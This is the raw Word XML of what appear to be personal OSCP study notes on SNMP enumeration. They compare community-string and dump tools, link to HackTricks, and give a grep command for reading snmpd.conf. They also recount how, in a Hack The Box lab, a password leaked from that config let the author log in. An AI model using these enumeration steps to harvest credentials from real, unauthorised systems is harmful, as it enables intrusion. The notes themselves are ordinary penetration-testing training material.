      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 6.4.6. SNMP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Autorecon runs both onesixtytone (to find community strings) and snmpwalk (for more enumeration of the specific community strings).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacktricks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1074">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://secybr.com/posts/snmp-pentesting-best-practicies/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Official hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1075">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html?highlight=snmp#1611621016110162udp---pentesting-snmp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003052">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003053">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003054">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iefx5bywxtrd" w:id="429"/>
      <w:bookmarkEnd w:id="429"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Config Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003055">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003056">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examine SNMP Configuration files (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1076">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hacktrick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003057">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003058">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v '^#' /etc/snmp/snmpd. conf | grep .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003059">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1077">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (56:40 time stamp):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw a file that was recently edited and it was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/snmp/snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was a VERY long file, but we can use grep to ignore the lines that start with comments and include only lines that begin with a character</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v '^#' /etc/snmp/snmpd. conf | grep .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v '^#' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">excludes any lines starting with "#"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003062">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes only lines starting with any character</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3799396" cy="1899698"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1078"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3799396" cy="1899698"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see a password leaked which was then used to login as a user </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003065">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003066">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003067">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_shd6ecmcgnjq" w:id="430"/>
      <w:bookmarkEnd w:id="430"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining all tools (onesixtyone, snmp-brute, snmp-check, snmpbulkwalk, snmpwalk)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003068">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003069">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating Community Strings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default on autorecon, and it's good but there was that one </w:t>
      </w:r>
      <w:hyperlink r:id="rId1079">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB box where it didn't find the "internal" community string but snmp-brute did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supposedly better than onesixtyone BUT it uses metasploit so DON'T USE IT DURING OSCP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping out entire SNMP database (for specific community string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CLEANEST </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output out of all the other dump tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Focuses on specific MIB instead of all of them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It formats everything nicely but maybe doesn't get as much info</w:t>
      </w:r>
